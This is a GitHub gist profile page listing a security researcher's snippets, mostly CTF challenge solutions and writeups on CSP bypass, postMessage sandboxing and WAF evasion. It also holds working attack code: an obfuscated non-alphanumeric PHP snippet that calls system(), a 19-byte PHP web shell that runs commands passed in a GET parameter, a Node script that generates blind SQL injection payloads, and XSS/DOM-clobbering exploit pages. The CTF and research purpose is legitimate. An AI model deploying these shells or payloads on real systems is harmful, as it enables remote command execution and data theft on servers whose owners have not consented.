Skip to content

Instantly share code, notes, and snippets.

View terjanq's full-sized avatar

terjanq

View GitHub Profile
@terjanq
terjanq / funny.php
Last active August 19, 2024 04:03
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
@terjanq
terjanq / rev_shell.php
Last active August 19, 2024 03:44
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@terjanq
terjanq / secdriven.md
Last active July 21, 2024 16:33
A TL;DR solution to Security Driven by @terjanq

A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only admin had access to it, because the file was private.

Disclamer: The write-up is written on airplane therefore the quality of it is poor, mostly to showcase the required steps to solve the challenge

@terjanq
terjanq / !!Postviewer.md
Last active June 26, 2024 05:51
Game Arcade & Postviewer v3 writeups by @terjanq

Postviewer v3 writeup by @terjanq

As it always have been with my challenges for Google CTF, they are based on real bugs I found internally. This year is a bit different though. This time the bugs were crafted by no other than me myself. One bug didn't manage to reach the production and the other is still present in prod making it effectively a 0day!

Both of my challenges (Postviewer v3 & Game Arcade) for this year are related to a sandboxing I've been working since the first postviewer challenge. You can read a little bit about it in

@terjanq
terjanq / README.md
Last active June 21, 2024 19:15
Another Another CSP | justCTF 2024 | writeup

Another Another CSP by @terjanq

image

Background

This year I created a copycat challenge of another-csp from DiceCTF Quals 2024. It was only solved by 1 team, DiceGang. Although the challenge looked almost identical, the solutions should be strictly different.

The intended solution of the original challenge was to leak one bit of information per admin visit based on crashing the browser renderer process with malicious CSS. (The below snippet was crashing the browser, but currently it's fixed)

@terjanq
terjanq / README.md
Last active June 14, 2024 14:36
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@terjanq
terjanq / README.md
Last active October 4, 2023 10:36
Postviewer challenge writeup from GoogleCTF 2022

Postviewer - writeup

Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of an all client-side simple page, i.e. no backend code was involved. A user can upload any file which will be then locally stored in indexedDB. They can preview their files by either clicking on the title or by visiting file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from data: URL. The rendering occurs by sending file's contents to the iframe via postMessage({ body, mimeType }, '*')

Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

@terjanq
terjanq / exploit.js
Last active August 5, 2023 10:42
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
@terjanq
terjanq / calc.html
Last active February 6, 2023 15:10
SekaiCTF 2022 solutions
<html>
<body>
<script>
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// create sandboxed domain, open challenge page and force its origin to be null
// null origin makes window.token undefined because of the error when accessing document.cookie
@terjanq
terjanq / HTPL-solution.html
Last active November 6, 2022 22:11
Hack.lu 2022 CTF solutions
<!--
This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language.
It's almost properly sandboxed but there is one bug that players needed to find.
The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon
and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering
and defined <iframe name=$win$>
-->
<iframe name=$win$></iframe>
<x-program>